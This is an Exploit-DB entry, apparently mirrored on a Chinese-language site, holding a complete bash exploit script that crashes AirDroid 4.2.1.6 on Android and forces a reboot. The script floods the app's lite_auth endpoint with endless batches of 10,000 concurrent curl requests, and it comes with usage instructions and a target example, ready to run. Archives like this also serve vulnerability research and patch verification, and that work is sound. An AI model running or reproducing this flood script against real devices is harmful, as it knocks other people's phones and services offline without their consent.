AirDroid 4.2.1.6 – Denial of Service

  • 作者: s4vitar
    日期: 2019-02-11
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/46337/
  • #!/bin/bash
    
    # *********************************************************************
    # * Author: Marcelo Vázquez (aka s4vitar) *
    # *AirDroid Denial of Service (DoS) & System Crash + Forced Reboot*
    # *********************************************************************
    
    # Exploit Title: AirDroid Remote Denial of Service (DoS) & System Crash + Forced Reboot
    # Date: 2019-02-13
    # Exploit Author: Marcelo Vázquez (aka s4vitar)
    # Collaborators: Victor Lasa (aka vowkin)
    # Vendor Homepage: https://web.airdroid.com/
    # Software Link: https://play.google.com/store/apps/details?id=com.sand.airdroid&hl=en
    # Version: <= AirDroid 4.2.1.6
    # Tested on: Android
    
    url=$1 # Example: http://192.168.1.46:8888
    requests=0
    
    trap ctrl_c INT
    
    # If Ctrl+C key is pressed then the threads are killed
    function ctrl_c() {
    echo -e "\n\n[*]Exiting...\n" && tput cnorm
    pkill curl > /dev/null 2>&1
    exit
    }
    
    # Detect number of arguments being passed to the program
    if [ "$(echo $#)" == "1" ]; then
    	# Infinite Loop
    	tput cnorm && while true; do
    		# We send 10000 requests in thread
    		for i in $(seq 1 10000); do
    			curl --silent "$url/sdctl/comm/lite_auth/" &
    			let requests+=1
    		done && wait # Here we wait for the threads to finish
    	echo "Requests Sent: $requests"
    	done
    else
    	echo -e "\nUsage: ./AirDroid_request.sh http://ip:port\n"
    fi